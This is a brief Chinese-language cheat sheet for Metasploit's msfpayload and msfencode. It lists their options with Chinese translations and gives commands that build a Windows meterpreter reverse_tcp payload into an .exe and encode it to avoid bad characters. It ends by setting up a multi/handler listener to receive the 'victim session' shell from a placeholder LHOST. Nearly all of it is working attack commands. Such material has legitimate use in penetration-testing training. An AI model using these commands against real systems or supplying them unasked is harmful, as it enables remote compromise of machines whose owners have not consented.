封装攻击载荷 msfpayload: Usage: msfpayload [] [var=val] Summary:summary and optons of payload C:C language Perl:Perl Ruby:Ruby Raw:Raw,allows payload to be piped into msfencode and other tools Js:JavaScript eXe:windows executable Dll:Dll Vba:VBA War:war package
example: msfpayload -l | grep windows | grep reverse_tcp | grep meterpreter msfpayload windows/meterpreter/reverse_tcp O:show options msfpayload [payload] X >xx.exe
攻击载荷编码 msfencode: Usage: msfencode OPTIONS: -a The architecture to encode as:哪种体系结构编码 -b The list of characters to avoid: ‘\x00\xff‘:指定要避免的字符 -c The number of times to encode the data:编码数据的次数 -d Specify the directory in which to look for EXE templates:指定搜索exe模板的目录 -e The encoder to use:使用的编码器 -h Help banner:帮助标题 -i Encode the contents of the supplied file path:为提供的文件内容编码 -k Keep template working; run payload in new thread (use with -x):让模板继续工作;即让载荷在新线程中运行 -l List available encoders:列出可用的编码器 -m Specifies an additional module search path:制定一个额外的模板搜索路径 -n Dump encoder information:输出编码器信息 -o The output file:输出文件 -p The platform to encode for:要编码的平台 -s The maximum size of the encoded data:编码后的最大字节数 -t The output format:输出格式 bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,vbs,war -v Increase verbosity:增加冗长 -x Specify an alternate executable template:指定一个备用的可执行文件模板
受害会话接收 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST x.x.x.x LPORT xxxx msf exploit(handler) > exploit [*] Started reverse handler on x.x.x.x:xxxx [*] Starting the payload handler...